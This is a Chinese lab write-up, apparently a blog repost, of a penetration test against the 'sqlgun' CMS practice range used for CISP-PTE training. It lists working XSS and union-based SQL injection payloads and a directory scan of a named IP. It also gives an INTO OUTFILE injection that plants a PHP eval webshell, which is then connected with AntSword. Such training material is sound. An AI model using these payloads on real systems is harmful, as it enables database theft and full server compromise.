当前位置: 首页 > article >正文

CISP-PTE CMS sqlgun靶场渗透测试

article 2025/2/22 5:35:09

1.打开靶场

2.在搜索框尝试xss

<script>alert(1)</script>

发现此处存在xss漏洞

3.在搜索框尝试sql注入

-1' union select 1,2,3# 发现页面有回显

4.查询数据库名

-1' union select 1,database(),3#

5.查询数据库的所有表

-1' union select 1,(select group_concat(table_name) from information_schema.tables where table_schema='sqlgunnews'),3#

6.扫描敏感目录

dirb http://124.221.58.83:8081

7.访问phpinfo

可以看见网站的绝对路径

8.通过sql注入写入一句话木马

-1' union select 1,"<?php @eval($_POST[cmd]);?>",3 into outfile '/var/www/html/1.php' #

9.访问写入的php文件

10.使用蚁剑进行连接


http://www.kler.cn/a/307615.html

相关文章:

  • 学习笔记 韩顺平 零基础30天学会Java(2024.9.16)
  • 神经网络_使用tensorflow对fashion mnist衣服数据集分类
  • uniapp js修改数组某个下标以外的所有值
  • 2024.09.08 校招 实习 内推 面经
  • python Open3D 验证安装崩溃
  • 论文内容分类与检测系统源码分享
  • String 72变 ---------各种字符串处理方法
  • WSL挂载U盘或移动硬盘
  • 一起对话式学习-机器学习02——机器学习方法三要素
  • Apache-wed服务器环境的安装
  • 智能工厂的设计软件 单一面问题分析方法的“独角兽”程序
  • JVM面试真题总结(七)
  • 总结对象相关知识
  • Go语言并发编程之select语句详解
  • 【相机方案(2)】V4L2 支持相机图像直接进入GPU内存吗?DeepStream 确实可以将图像数据高效地放入GPU内存进行处理!
  • 后端开发刷题 | 打家劫舍
  • gin基本使用
  • 30款免费好用的工具,打工人必备!
  • 基于Keil软件实现实时时钟(江协科技HAL库)
  • Java-数据结构-二叉树-基础 (o゚▽゚)o